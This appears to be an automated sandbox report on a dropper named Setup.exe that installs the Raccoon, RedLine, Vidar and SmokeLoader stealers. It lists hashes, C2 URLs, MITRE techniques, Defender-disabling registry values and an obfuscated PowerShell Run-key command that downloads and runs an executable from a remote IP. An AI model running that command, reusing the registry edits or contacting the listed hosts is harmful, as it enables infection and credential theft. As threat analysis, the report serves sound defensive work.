raccoon | 40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5

Target

Setup.exe
Size

1.6MB
MD5

ce6eaa52767b2df78b34519231966588
SHA1

ab32d09951189022a1a39e9204ec9ce2926b3fcf
SHA256

40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5
SHA512

36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067

Score

10^/10

raccoon redline smokeloader vidar c8a4bc819c641415a3c45622368953a684036cdb backdoor discovery evasion infostealer persistence spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

c8a4bc819c641415a3c45622368953a684036cdb

Attributes

url4cnc
https://telete.in/jjbadb0y

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2588-235-0x0000000000400000-0x0000000000945000-memory.dmp	family_raccoon
behavioral1/memory/2588-234-0x0000000000220000-0x00000000002B3000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2116-308-0x0000000000418E3E-mapping.dmp	family_redline
behavioral1/memory/3300-368-0x0000000000418E56-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE GCleaner Downloader Activity M3
suricata: ET MALWARE GCleaner Downloader Activity M3
suricata
suricata: ET MALWARE GCleaner Related Downloader User-Agent
suricata: ET MALWARE GCleaner Related Downloader User-Agent
suricata
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
suricata
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata

CustAttr .NET packer 1 IoCs

Detects CustAttr .NET packer in memory.

Processes:

resource	yara_rule
behavioral1/memory/2032-109-0x0000000000390000-0x000000000039B000-memory.dmp	CustAttr

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1060-315-0x000000000046B77D-mapping.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 34 IoCs

Processes:

kwYfAn7rWvI3Bd0Widr_mMCb.exezrFWNMth_T3qUm4429q0tg57.exelCY5QLNqAnem93OEfP0C_Vm2.exedo0w8S5c9Z6oyqB0T0RTF7PN.exeNFYLZgpNwsSc01ccwSoFV4bD.exeJNgBeK3x8i1nLadrgULJBCaS.exeRuntimebroker.exeLmZNldMKHYtuUoYYHzPIp7h3.exePenEJEH0A6xi5OAUR35AaDEO.exe5nmMrSQ7DIeZiD_mvJ9tb8nC.exeexEFL08esRh1mnTiUjUFeDXG.exeexEFL08esRh1mnTiUjUFeDXG.tmpLWIEoUgdNGDeqUec96ZlCsNI.exe_pHSZc3WXEPknSDDq6TlcA30.execonhost.exeH3m7I4Piy4XRc9gztBmFEilM.exe2797771.exe3521828.exe9335430559.exe8360630.exeAdvancedRun.exe932586418.exeAdvancedRun.exeDFFsRBLXKx3YFMKw15Lx4HtJ.exeSgsmmodul.comgqy6LfOIXkqH51iYnrZGV3Eo.exeraYFEiiE31PUMm3nMxTElHSK.exe2314402.exeveMZca_7cTG2JBC_hpaLLzxx.exexGlL27MolKeBr2BX4cQjWF8d.execustomer3.exemd8_8eus.exejooyu.exeDllHost.exe

pid	process
324	kwYfAn7rWvI3Bd0Widr_mMCb.exe
740	zrFWNMth_T3qUm4429q0tg57.exe
1060	lCY5QLNqAnem93OEfP0C_Vm2.exe
1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe
1764	NFYLZgpNwsSc01ccwSoFV4bD.exe
2032	JNgBeK3x8i1nLadrgULJBCaS.exe
1088	Runtimebroker.exe
1312	LmZNldMKHYtuUoYYHzPIp7h3.exe
1320	PenEJEH0A6xi5OAUR35AaDEO.exe
1640	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
2120	exEFL08esRh1mnTiUjUFeDXG.exe
2164	exEFL08esRh1mnTiUjUFeDXG.tmp
2224	LWIEoUgdNGDeqUec96ZlCsNI.exe
2244	_pHSZc3WXEPknSDDq6TlcA30.exe
2288	conhost.exe
2276	H3m7I4Piy4XRc9gztBmFEilM.exe
2316	2797771.exe
2460	3521828.exe
2588	9335430559.exe
2760	8360630.exe
3064	AdvancedRun.exe
2092	932586418.exe
2140	AdvancedRun.exe
520	DFFsRBLXKx3YFMKw15Lx4HtJ.exe
2204	Sgsmmodul.com
1108	gqy6LfOIXkqH51iYnrZGV3Eo.exe
2300	raYFEiiE31PUMm3nMxTElHSK.exe
2868	2314402.exe
2492	veMZca_7cTG2JBC_hpaLLzxx.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe
2724	customer3.exe
2788	md8_8eus.exe
2556	jooyu.exe
328	DllHost.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

veMZca_7cTG2JBC_hpaLLzxx.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	veMZca_7cTG2JBC_hpaLLzxx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	veMZca_7cTG2JBC_hpaLLzxx.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Setup.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\International\Geo\Nation Setup.exe
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\International\Geo\Nation	Setup.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 46 IoCs

Processes:

Setup.exedo0w8S5c9Z6oyqB0T0RTF7PN.exeRuntimebroker.exeexEFL08esRh1mnTiUjUFeDXG.exeexEFL08esRh1mnTiUjUFeDXG.tmpcmd.exerundll32.exe5nmMrSQ7DIeZiD_mvJ9tb8nC.exeNFYLZgpNwsSc01ccwSoFV4bD.exeAdvancedRun.execmd.exexGlL27MolKeBr2BX4cQjWF8d.exe

pid	process
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe
1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe
1088	Runtimebroker.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
2120	exEFL08esRh1mnTiUjUFeDXG.exe
2164	exEFL08esRh1mnTiUjUFeDXG.tmp
2164	exEFL08esRh1mnTiUjUFeDXG.tmp
2164	exEFL08esRh1mnTiUjUFeDXG.tmp
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
2388	cmd.exe
2388	cmd.exe
2548	rundll32.exe
1640	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
1640	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
1764	NFYLZgpNwsSc01ccwSoFV4bD.exe
3064	AdvancedRun.exe
3064	AdvancedRun.exe
1808	Setup.exe
1808	Setup.exe
2792	cmd.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
1808	Setup.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe
2608	xGlL27MolKeBr2BX4cQjWF8d.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2240 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2240	icacls.exe

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

5nmMrSQ7DIeZiD_mvJ9tb8nC.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\5nmMrSQ7DIeZiD_mvJ9tb8nC.exe = "0"	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.2'+'41'+'.19.5'+'2/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

veMZca_7cTG2JBC_hpaLLzxx.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	veMZca_7cTG2JBC_hpaLLzxx.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 27 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
426	api.2ip.ua
242	ipinfo.io
316	api.2ip.ua
499	api.2ip.ua
231	ipinfo.io
252	ipinfo.io
219	ipinfo.io
255	ipinfo.io
449	api.2ip.ua
2	ipinfo.io
194	freegeoip.app
239	ipinfo.io
317	api.2ip.ua
342	api.2ip.ua
387	ipinfo.io
185	ipinfo.io
188	freegeoip.app
251	ipinfo.io
388	ipinfo.io
186	freegeoip.app
241	ipinfo.io
158	ipinfo.io
203	freegeoip.app
218	ipinfo.io
498	api.2ip.ua
3	ipinfo.io
156	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

veMZca_7cTG2JBC_hpaLLzxx.exe

pid process

2492 veMZca_7cTG2JBC_hpaLLzxx.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

5nmMrSQ7DIeZiD_mvJ9tb8nC.exe

description pid process target process

PID 1640 set thread context of 328 1640 5nmMrSQ7DIeZiD_mvJ9tb8nC.exe DllHost.exe

pid	process
2492	veMZca_7cTG2JBC_hpaLLzxx.exe

description	pid	process	target process
PID 1640 set thread context of 328	1640	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe	DllHost.exe

autoit_exe 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe	autoit_exe
C:\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe	autoit_exe
C:\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe	autoit_exe

Drops file in Program Files directory 5 IoCs

Processes:

xGlL27MolKeBr2BX4cQjWF8d.exe

description	ioc	process
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	xGlL27MolKeBr2BX4cQjWF8d.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	xGlL27MolKeBr2BX4cQjWF8d.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	xGlL27MolKeBr2BX4cQjWF8d.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	xGlL27MolKeBr2BX4cQjWF8d.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	xGlL27MolKeBr2BX4cQjWF8d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process
2196	2788	WerFault.exe
3832	1108	WerFault.exe	gqy6LfOIXkqH51iYnrZGV3Eo.exe
3864	1060	WerFault.exe	aRt8AobJPO4HynqoCvWpW1oE.exe
4064	2316	WerFault.exe	2797771.exe
3864	2460	WerFault.exe	3521828.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

zrFWNMth_T3qUm4429q0tg57.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zrFWNMth_T3qUm4429q0tg57.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zrFWNMth_T3qUm4429q0tg57.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zrFWNMth_T3qUm4429q0tg57.exe

Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

2884 timeout.exe
868 timeout.exe
2324 timeout.exe
2852 timeout.exe
3408 timeout.exe
3576 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3196 taskkill.exe
3992 taskkill.exe
3248 taskkill.exe
2852 taskkill.exe

pid	process
2884	timeout.exe
868	timeout.exe
2324	timeout.exe
2852	timeout.exe
3408	timeout.exe
3576	timeout.exe

pid	process
3196	taskkill.exe
3992	taskkill.exe
3248	taskkill.exe
2852	taskkill.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Setup.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2128 PING.EXE

pid	process
2128	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	162	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	193	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exezrFWNMth_T3qUm4429q0tg57.exe

pid	process
1808	Setup.exe
740	zrFWNMth_T3qUm4429q0tg57.exe
740	zrFWNMth_T3qUm4429q0tg57.exe
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220
1220

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1220
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

zrFWNMth_T3qUm4429q0tg57.exe

pid process

740 zrFWNMth_T3qUm4429q0tg57.exe

pid	process
1220

pid	process
740	zrFWNMth_T3qUm4429q0tg57.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

lCY5QLNqAnem93OEfP0C_Vm2.exepowershell.exeLmZNldMKHYtuUoYYHzPIp7h3.exePenEJEH0A6xi5OAUR35AaDEO.exe2797771.exe8360630.exepowershell.exeAdvancedRun.exeAdvancedRun.exe5nmMrSQ7DIeZiD_mvJ9tb8nC.exepowershell.exe2314402.exe_pHSZc3WXEPknSDDq6TlcA30.exe

description	pid	process
Token: SeDebugPrivilege	1060	lCY5QLNqAnem93OEfP0C_Vm2.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1312	LmZNldMKHYtuUoYYHzPIp7h3.exe
Token: SeDebugPrivilege	1320	PenEJEH0A6xi5OAUR35AaDEO.exe
Token: SeShutdownPrivilege	1220
Token: SeDebugPrivilege	2316	2797771.exe
Token: SeDebugPrivilege	2760	8360630.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	3064	AdvancedRun.exe
Token: SeImpersonatePrivilege	3064	AdvancedRun.exe
Token: SeDebugPrivilege	2140	AdvancedRun.exe
Token: SeImpersonatePrivilege	2140	AdvancedRun.exe
Token: SeDebugPrivilege	1640	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2868	2314402.exe
Token: SeDebugPrivilege	2244	_pHSZc3WXEPknSDDq6TlcA30.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

pid process

1220
1220
1220
1220

pid	process
1220
1220
1220
1220

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exedo0w8S5c9Z6oyqB0T0RTF7PN.exeRuntimebroker.exeexEFL08esRh1mnTiUjUFeDXG.exe

description	pid	process	target process
PID 1808 wrote to memory of 740	1808	Setup.exe	zrFWNMth_T3qUm4429q0tg57.exe
PID 1808 wrote to memory of 740	1808	Setup.exe	zrFWNMth_T3qUm4429q0tg57.exe
PID 1808 wrote to memory of 740	1808	Setup.exe	zrFWNMth_T3qUm4429q0tg57.exe
PID 1808 wrote to memory of 740	1808	Setup.exe	zrFWNMth_T3qUm4429q0tg57.exe
PID 1808 wrote to memory of 324	1808	Setup.exe	kwYfAn7rWvI3Bd0Widr_mMCb.exe
PID 1808 wrote to memory of 324	1808	Setup.exe	kwYfAn7rWvI3Bd0Widr_mMCb.exe
PID 1808 wrote to memory of 324	1808	Setup.exe	kwYfAn7rWvI3Bd0Widr_mMCb.exe
